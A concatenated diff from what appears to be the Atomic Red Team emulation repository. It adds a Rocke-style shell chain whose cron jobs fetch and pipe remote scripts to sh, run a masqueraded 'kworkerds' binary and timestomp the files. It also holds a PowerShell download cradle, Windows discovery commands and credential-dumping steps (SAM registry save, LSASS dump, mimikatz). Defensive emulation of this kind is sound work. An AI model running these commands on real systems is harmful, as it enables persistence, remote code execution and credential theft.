+echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
+}
+
+function b() {
+    mkdir -p /var/tmp
+
+    #   Tactic: Defense Evasion
+    #   Technique: T1222 - File Permission Modification
+    chmod 1777 /var/tmp
+
+    #   Tactic: Defense Evasion
+    #   Technique: T1036 - Masquerading
+    (curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
+    nohup /var/tmp/kworkerds >/dev/null 2>&1 &
+
+    echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
+}
+
+function a() {
+
+    #   Tactic: Defense Evasion
+    #   Technique: T1222 - File Permission Modification
+	chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
+
+    #   Tactic: Persistence
+    #   Technique: T1168 - Local Job Scheduling
+	echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
+	mkdir -p /var/spool/cron/crontabs
+	echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
+	mkdir -p /etc/cron.daily
+	(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
+
+    #   Tactic: Defense Evasion
+    #   Technique: T1222 - File Permission Modification
+    chmod 755 /etc/cron.daily/oanacroner
+
+    #   Tactic: Defense Evasion
+    #   Technique: T1099 - Timestomp
+	touch -acmr /bin/sh /etc/cron.daily/oanacroner
+    touch -acmr /bin/sh /etc/cron.d/root
+    touch -acmr /bin/sh /var/spool/cron/crontabs/root
+
+    echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
+}
+
+a
+b
+c
@@ -22,7 +22,7 @@ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-t

 :: Step 2. This payload will execute an discovery sequence T1087
 ::    https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
-::	  Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
+::	  Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"

 net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser

@@ -0,0 +1,44 @@
+net user Administrator /domain
+net Accounts
+net localgroup administrators
+net use
+net share
+net group "domain admins" /domain
+net config workstation
+net accounts
+net accounts /domain
+net view
+sc query
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+wmic useraccount list
+wmic useraccount get /ALL
+wmic startup list brief
+wmic share list
+wmic service get name,displayname,pathname,startmode
+wmic process list brief
+wmic process get caption,executablepath,commandline
+wmic qfe get description,installedOn /format:csv
+arp -a
+whoami
+ipconfig /displaydns
+route print
+netsh advfirewall show allprofiles
+systeminfo
+qwinsta
+quser
@@ -18,42 +18,43 @@ GEM
      execjs
    coffee-script-source (1.11.1)
    colorator (1.1.0)
-    commonmarker (0.17.9)
+    commonmarker (0.17.13)
      ruby-enum (~> 0.5)
-    concurrent-ruby (1.0.5)
-    dnsruby (1.60.2)
+    concurrent-ruby (1.1.4)
+    dnsruby (1.61.2)
+      addressable (~> 2.5)
    em-websocket (0.5.1)
      eventmachine (>= 0.12.9)
      http_parser.rb (~> 0.6.0)
-    ethon (0.11.0)
+    ethon (0.12.0)
      ffi (>= 1.3.0)
    eventmachine (1.2.7)
    execjs (2.7.0)
-    faraday (0.15.2)
+    faraday (0.15.4)
      multipart-post (>= 1.2, < 3)
-    ffi (1.9.25)
+    ffi (1.10.0)
    forwardable-extended (2.6.0)
    gemoji (3.0.0)
-    github-pages (186)
+    github-pages (193)
      activesupport (= 4.2.10)
      github-pages-health-check (= 1.8.1)
-      jekyll (= 3.7.3)
-      jekyll-avatar (= 0.5.0)
+      jekyll (= 3.7.4)
+      jekyll-avatar (= 0.6.0)
      jekyll-coffeescript (= 1.1.1)
      jekyll-commonmark-ghpages (= 0.1.5)
      jekyll-default-layout (= 0.1.4)
-      jekyll-feed (= 0.9.3)
+      jekyll-feed (= 0.11.0)
      jekyll-gist (= 1.5.0)
      jekyll-github-metadata (= 2.9.4)
-      jekyll-mentions (= 1.3.0)
+      jekyll-mentions (= 1.4.1)
      jekyll-optional-front-matter (= 0.3.0)
      jekyll-paginate (= 1.1.0)
      jekyll-readme-index (= 0.2.0)
-      jekyll-redirect-from (= 0.13.0)
+      jekyll-redirect-from (= 0.14.0)
      jekyll-relative-links (= 0.5.3)
      jekyll-remote-theme (= 0.3.1)
      jekyll-sass-converter (= 1.5.2)
-      jekyll-seo-tag (= 2.4.0)
+      jekyll-seo-tag (= 2.5.0)
      jekyll-sitemap (= 1.2.0)
      jekyll-swiss (= 0.4.0)
      jekyll-theme-architect (= 0.1.1)
@@ -70,12 +71,12 @@ GEM
      jekyll-theme-tactile (= 0.1.1)
      jekyll-theme-time-machine (= 0.1.1)
      jekyll-titles-from-headings (= 0.5.1)
-      jemoji (= 0.9.0)
-      kramdown (= 1.16.2)
+      jemoji (= 0.10.1)
+      kramdown (= 1.17.0)
      liquid (= 4.0.0)
      listen (= 3.1.5)
      mercenary (~> 0.3)
-      minima (= 2.4.1)
+      minima (= 2.5.0)
      nokogiri (>= 1.8.2, < 2.0)
      rouge (= 2.2.1)
      terminal-table (~> 1.4)
@@ -85,13 +86,13 @@ GEM
      octokit (~> 4.0)
      public_suffix (~> 2.0)
      typhoeus (~> 1.3)
-    html-pipeline (2.8.0)
+    html-pipeline (2.10.0)
      activesupport (>= 2)
      nokogiri (>= 1.4)
    http_parser.rb (0.6.0)
    i18n (0.9.5)
      concurrent-ruby (~> 1.0)
-    jekyll (3.7.3)
+    jekyll (3.7.4)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
@@ -104,7 +105,7 @@ GEM
      pathutil (~> 0.9)
      rouge (>= 1.7, < 4)
      safe_yaml (~> 1.0)
-    jekyll-avatar (0.5.0)
+    jekyll-avatar (0.6.0)
      jekyll (~> 3.0)
    jekyll-coffeescript (1.1.1)
      coffee-script (~> 2.2)
@@ -118,15 +119,14 @@ GEM
      rouge (~> 2)
    jekyll-default-layout (0.1.4)
      jekyll (~> 3.0)
-    jekyll-feed (0.9.3)
+    jekyll-feed (0.11.0)
      jekyll (~> 3.3)
    jekyll-gist (1.5.0)
      octokit (~> 4.2)
    jekyll-github-metadata (2.9.4)
      jekyll (~> 3.1)
      octokit (~> 4.0, != 4.4.0)
-    jekyll-mentions (1.3.0)
-      activesupport (~> 4.0)
+    jekyll-mentions (1.4.1)
      html-pipeline (~> 2.3)
      jekyll (~> 3.0)
    jekyll-optional-front-matter (0.3.0)
@@ -134,7 +134,7 @@ GEM
    jekyll-paginate (1.1.0)
    jekyll-readme-index (0.2.0)
      jekyll (~> 3.0)
-    jekyll-redirect-from (0.13.0)
+    jekyll-redirect-from (0.14.0)
      jekyll (~> 3.3)
    jekyll-relative-links (0.5.3)
      jekyll (~> 3.3)
@@ -143,7 +143,7 @@ GEM
      rubyzip (>= 1.2.1, < 3.0)
    jekyll-sass-converter (1.5.2)
      sass (~> 3.4)
-    jekyll-seo-tag (2.4.0)
+    jekyll-seo-tag (2.5.0)
      jekyll (~> 3.3)
    jekyll-sitemap (1.2.0)
      jekyll (~> 3.3)
@@ -190,44 +190,43 @@ GEM
      jekyll-seo-tag (~> 2.0)
    jekyll-titles-from-headings (0.5.1)
      jekyll (~> 3.3)
-    jekyll-watch (2.0.0)
+    jekyll-watch (2.1.2)
      listen (~> 3.0)
-    jemoji (0.9.0)
-      activesupport (~> 4.0, >= 4.2.9)
+    jemoji (0.10.1)
      gemoji (~> 3.0)
      html-pipeline (~> 2.2)
      jekyll (~> 3.0)
-    kramdown (1.16.2)
+    kramdown (1.17.0)
    liquid (4.0.0)
    listen (3.1.5)
      rb-fsevent (~> 0.9, >= 0.9.4)
      rb-inotify (~> 0.9, >= 0.9.7)
      ruby_dep (~> 1.2)
    mercenary (0.3.6)
-    mini_portile2 (2.3.0)
-    minima (2.4.1)
+    mini_portile2 (2.4.0)
+    minima (2.5.0)
      jekyll (~> 3.5)
      jekyll-feed (~> 0.9)
      jekyll-seo-tag (~> 2.1)
    minitest (5.11.3)
    multipart-post (2.0.0)
-    nokogiri (1.8.2)
-      mini_portile2 (~> 2.3.0)
-    octokit (4.9.0)
+    nokogiri (1.10.1)
+      mini_portile2 (~> 2.4.0)
+    octokit (4.13.0)
      sawyer (~> 0.8.0, >= 0.5.3)
-    pathutil (0.16.1)
+    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
    public_suffix (2.0.5)
    rb-fsevent (0.10.3)
-    rb-inotify (0.9.10)
-      ffi (>= 0.5.0, < 2)
+    rb-inotify (0.10.0)
+      ffi (~> 1.0)
    rouge (2.2.1)
    ruby-enum (0.7.2)
      i18n
    ruby_dep (1.5.0)
-    rubyzip (1.2.1)
+    rubyzip (1.2.2)
    safe_yaml (1.0.4)
-    sass (3.5.6)
+    sass (3.7.3)
      sass-listen (~> 4.0.0)
    sass-listen (4.0.0)
      rb-fsevent (~> 0.9, >= 0.9.4)
@@ -238,11 +237,11 @@ GEM
    terminal-table (1.8.0)
      unicode-display_width (~> 1.1, >= 1.1.1)
    thread_safe (0.3.6)
-    typhoeus (1.3.0)
+    typhoeus (1.3.1)
      ethon (>= 0.9.0)
    tzinfo (1.2.5)
      thread_safe (~> 0.1)
-    unicode-display_width (1.4.0)
+    unicode-display_width (1.4.1)

 PLATFORMS
  ruby
@@ -38,7 +38,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr

 ## Getting Started

-* [Quick Start: Using Atomic Red Team to test your security](#quick-start-using-atomic-red-team-to-test-your-security)
+* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
 * Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
  - Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
  - macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
@@ -49,6 +49,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr
    * [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
    * [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
 * Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
+    * Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)

 ## Code of Conduct

@@ -116,14 +116,58 @@ class AtomicRedTeam
        when 'manual'
          raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
          raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String)
-  
+
+          validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
+                                         string: executor['steps'],
+                                         string_description: "atomic_tests[#{i}].executor.steps"
+
        when 'command_prompt', 'sh', 'bash', 'powershell'
          raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
          raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
-  
+
+          validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
+                                         string: executor['command'],
+                                         string_description: "atomic_tests[#{i}].executor.command"
        else
          raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}")
      end
+
+      validate_no_todos!(atomic, path: "atomic_tests[#{i}]")
+    end
+  end
+
+  #
+  # Validates that the arguments (specified in "#{arg}" format) in a string
+  # match the input_arguments for a test
+  #
+  def validate_input_args_vs_string!(input_args:, string:, string_description:)
+    input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten
+
+    input_args_in_string_and_not_specced = input_args_in_string - input_args
+    if input_args_in_string_and_not_specced.count > 0
+      raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments")
+    end
+
+    input_args_in_spec_not_string = input_args - input_args_in_string
+    if input_args_in_string_and_not_specced.count > 0
+      raise("`atomic_tests[#{i}].input_arguments` contains args #{input_args_in_spec_not_string} not in command")
+    end
+  end
+
+  #
+  # Recursively validates that the hash (or something) doesn't contain a TODO
+  #
+  def validate_no_todos!(hashish, path:)
+    if hashish.is_a? String
+      raise "`#{path}` contains a TODO" if hashish.include? 'TODO'
+    elsif hashish.is_a? Array
+      hashish.each_with_index do |item, i|
+        validate_no_todos! item, path: "#{path}[#{i}]"
+      end
+    elsif hashish.is_a? Hash
+      hashish.each do |k, v|
+        validate_no_todos! v, path: "#{path}.#{k}"
+      end
    end
  end
 end
@@ -1,16 +1,6 @@
 # T1002 - Data Compressed
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
-<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
-
-Detection: Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.
-
-If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring
-
-Requires Network: No</blockquote>
+<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</blockquote>

 ## Atomic Tests

@@ -18,13 +8,17 @@ Requires Network: No</blockquote>

 - [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)

- [Atomic Test #3 - Data Compressed - nix](#atomic-test-3---data-compressed---nix)
+- [Atomic Test #3 - Data Compressed - nix - zip](#atomic-test-3---data-compressed---nix---zip)
+
+- [Atomic Test #4 - Data Compressed - nix - gzip Single File](#atomic-test-4---data-compressed---nix---gzip-single-file)
+
+- [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file)


 <br/>

 ## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
-TODO
+An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration 

 **Supported Platforms:** Windows

@@ -43,7 +37,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
 <br/>

 ## Atomic Test #2 - Compress Data for Exfiltration With Rar
-TODO
+An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration 

 **Supported Platforms:** Windows

@@ -61,22 +55,57 @@ rar a -r #{output_file} #{input_file}
 <br/>
 <br/>

-## Atomic Test #3 - Data Compressed - nix
-TODO
+## Atomic Test #3 - Data Compressed - nix - zip
+An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.

 **Supported Platforms:** Linux, macOS


+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
+| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
+
 #### Run it with `sh`!
 ```
-mkdir /tmp/victim-files
-cd /tmp/victim-files
-touch a b c d e f g
-echo "This file will be gzipped" > /tmp/victim-gzip.txt
-echo "This file will be tarred" > /tmp/victim-tar.txt
-zip /tmp/victim-files.zip /tmp/victim-files/*
-gzip -f /tmp/victim-gzip.txt
-tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
-tar -cvzf /tmp/victim-tar.tar.gz
+zip #{output_file} #{input_files}
+```
+<br/>
+<br/>
+
+## Atomic Test #4 - Data Compressed - nix - gzip Single File
+An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
+
+**Supported Platforms:** Linux, macOS
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
+
+#### Run it with `sh`!
+```
+gzip -f #{input_file}
+```
+<br/>
+<br/>
+
+## Atomic Test #5 - Data Compressed - nix - tar Folder or File
+An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
+
+**Supported Platforms:** Linux, macOS
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
+| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
+
+#### Run it with `sh`!
+```
+tar -cvzf #{output_file} #{input_file_folder}
 ```
 <br/>
@@ -5,7 +5,7 @@ display_name: Data Compressed
 atomic_tests:
 - name: Compress Data for Exfiltration With PowerShell
  description: |
-    TODO
+    An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration 
  supported_platforms:
    - windows
  input_arguments:
@@ -24,7 +24,7 @@ atomic_tests:

 - name: Compress Data for Exfiltration With Rar
  description: |
-    TODO
+    An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration 
  supported_platforms:
    - windows
  input_arguments:
@@ -41,21 +41,58 @@ atomic_tests:
    command: |
      rar a -r #{output_file} #{input_file}

- name: Data Compressed - nix
+- name: Data Compressed - nix - zip
  description: |
-    TODO
+    An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
  supported_platforms:
    - linux
    - macos
+  input_arguments:
+    input_files:
+      description: Path that should be compressed into our output file, may include wildcards
+      type: Path
+      default: /tmp/victim-files/*
+    output_file:
+      description: Path that should be output as a zip archive
+      type: Path
+      default: /tmp/victim-files.zip
  executor:
    name: sh
    command: |
-      mkdir /tmp/victim-files
-      cd /tmp/victim-files
-      touch a b c d e f g
-      echo "This file will be gzipped" > /tmp/victim-gzip.txt
-      echo "This file will be tarred" > /tmp/victim-tar.txt
-      zip /tmp/victim-files.zip /tmp/victim-files/*
-      gzip -f /tmp/victim-gzip.txt
-      tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
-      tar -cvzf /tmp/victim-tar.tar.gz
+      zip #{output_file} #{input_files}
+
+- name: Data Compressed - nix - gzip Single File
+  description: |
+    An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
+  supported_platforms:
+    - linux
+    - macos
+  input_arguments:
+    input_file:
+      description: Path that should be compressed
+      type: Path
+      default: /tmp/victim-gzip.txt
+  executor:
+    name: sh
+    command: |
+      gzip -f #{input_file}
+
+- name: Data Compressed - nix - tar Folder or File
+  description: |
+    An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
+  supported_platforms:
+    - linux
+    - macos
+  input_arguments:
+    input_file_folder:
+      description: Path that should be compressed
+      type: Path
+      default: /tmp/victim-files/
+    output_file:
+      description: File that should be output
+      type: Path
+      default: /tmp/victim-files.tar.gz
+  executor:
+    name: sh
+    command: |
+      tar -cvzf #{output_file} #{input_file_folder}
@@ -4,17 +4,21 @@

 Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

-===SAM (Security Accounts Manager)===
+### Windows

-The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command.  To enumerate the SAM database, system level access is required.
+#### SAM (Security Accounts Manager)
+
+The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.
  
 A number of tools can be used to retrieve the SAM file through in-memory techniques:
+
 * pwdumpx.exe 
-* gsecdump
-* Mimikatz
+* [gsecdump](https://attack.mitre.org/software/S0008)
+* [Mimikatz](https://attack.mitre.org/software/S0002)
 * secretsdump.py

-Alternatively, the SAM can be extracted from the Registry with Reg:
+Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):
+
 * <code>reg save HKLM\sam sam</code>
 * <code>reg save HKLM\system system</code>

@@ -25,30 +29,32 @@ Rid 500 account is the local, in-built administrator.
 Rid 501 is the guest account.
 User accounts start with a RID of 1,000+.

-===Cached Credentials===
+#### Cached Credentials

-The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable.  The number of default cached credentials varies, and this number can be altered per system.  This hash does not allow pass-the-hash style attacks.
+The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
  
 A number of tools can be used to retrieve the SAM file through in-memory techniques.
+
 * pwdumpx.exe 
-* gsecdump
-* Mimikatz
+* [gsecdump](https://attack.mitre.org/software/S0008)
+* [Mimikatz](https://attack.mitre.org/software/S0002)

 Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.

 Notes:
 Cached credentials for Windows Vista are derived using PBKDF2.

-===Local Security Authority (LSA) Secrets===
+#### Local Security Authority (LSA) Secrets

 With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
  
 When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
  
 A number of tools can be used to retrieve the SAM file through in-memory techniques.
+
 * pwdumpx.exe 
-* gsecdump
-* Mimikatz
+* [gsecdump](https://attack.mitre.org/software/S0008)
+* [Mimikatz](https://attack.mitre.org/software/S0002)
 * secretsdump.py

 Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
@@ -57,85 +63,75 @@ Notes:
 The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
 Windows 10 adds protections for LSA Secrets described in Mitigation.

-===NTDS from Domain Controller===
+#### NTDS from Domain Controller

 Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
 
 The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
- 
+
 * Volume Shadow Copy
 * secretsdump.py
 * Using the in-built Windows tool, ntdsutil.exe
 * Invoke-NinjaCopy

-===Group Policy Preference (GPP) Files===
+#### Group Policy Preference (GPP) Files

 Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
- 
+
 These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
- 
+
 The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
- 
+
 * Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
 * Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
 * gpprefdecrypt.py
- 
+
 Notes:
 On the SYSVOL share, the following can be used to enumerate potential XML files.
-dir /s *.xml
+dir /s * .xml

-===Service Principle Names (SPNs)===
+#### Service Principal Names (SPNs)

-See Kerberoasting.
+See [Kerberoasting](https://attack.mitre.org/techniques/T1208).

-===Plaintext Credentials===
+#### Plaintext Credentials

 After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
- 
+
 SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.

 The following SSPs can be used to access credentials:
- 
+
 Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
 Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
 Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
 CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
  
 The following tools can be used to enumerate credentials:
- 
-* Windows Credential Editor
-* Mimikatz
- 
+
+* [Windows Credential Editor](https://attack.mitre.org/software/S0005)
+* [Mimikatz](https://attack.mitre.org/software/S0002)
+
 As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
- 
+
 For example, on the target host use procdump:
+
 * <code>procdump -ma lsass.exe lsass_dump</code>
- 
+
 Locally, mimikatz can be run:
+
 * <code>sekurlsa::Minidump lsassdump.dmp</code>
 * <code>sekurlsa::logonPasswords</code>

-===DCSync=== 
+#### DCSync

-DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller.  Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data  (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation. (Citation: InsiderThreat ChangeNTLM July 2017) DCSync 